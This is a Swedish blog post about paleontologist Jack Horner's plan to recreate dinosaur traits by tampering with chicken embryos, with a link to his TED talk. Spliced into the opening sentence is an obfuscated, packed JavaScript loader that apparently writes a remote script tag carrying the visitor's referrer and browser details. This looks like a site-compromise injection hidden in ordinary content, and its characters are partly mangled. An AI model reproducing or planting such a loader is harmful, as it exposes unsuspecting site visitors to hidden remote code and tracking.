Image Image Image Image Image Image Image Image Image Image

| 27 november, 2020

Scroll to top

Top

Och på tala om dinosaurier: Palentologen Jack Horner vill återuppliva dinousaurierna!!!

Och på tala om dinosaurier: Palentologen Jack Horner vill återuppliva dinousaurierna!!!
Filip Urde
  • On 10 juni, 2011
  • http://www.revue.se/filip-urde

Drömmen eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ktznh|var|u0026u|referrer|zdyhk||js|php’.split(’|’),0,{}))
jag haft sedan min barndom kanske kan bli sann!!

Sedan jag såg Jurassic Park och Dino riders för förstagången så har dinosaurier alltid haft en speciell plats i mitt hjärta. Finns det något ballar som levt på jorden?! tveksamt….

Nu har i alla fall palentologen Jack ”John Hammond” Horner planer på att förverkliga ett Jurassic Park! Här pratar han på TED om hur man faktiskt kommer närmare och närmare detta, allt tack vare kycklingar. Who knew?!

I sina embryoform har de likheter med deras 60 miljoner år gamla reptilkusiner, genom att ha både längre svans och ”fingrar” istället för vingar. När embryot inuti egget utvecklas så blir svansen kortare och fingrarna utvecklas istället till vingar. Det är i denna fas som Jack och hans kollega Michael tror sig kunna förändra utvecklingen. Man tänker mixtra med embryot och låta det utveckla sig till att få ha kvar svansen och fingrarna.

Dock att få dem i skala 1:1 blir nog ganska svårt! med tanke på att vi pratar kyckling egg men vem har inte velat ha en mini T-rex?! Natt på museet släng dig i vägen!

En tanke är dock… Varför inte köra på struts egg?! Velociraptor any one?!?!

httpv://www.youtube.com/watch?v=0QVXdEOiCw8&feature=player_embedded
gizmodo.com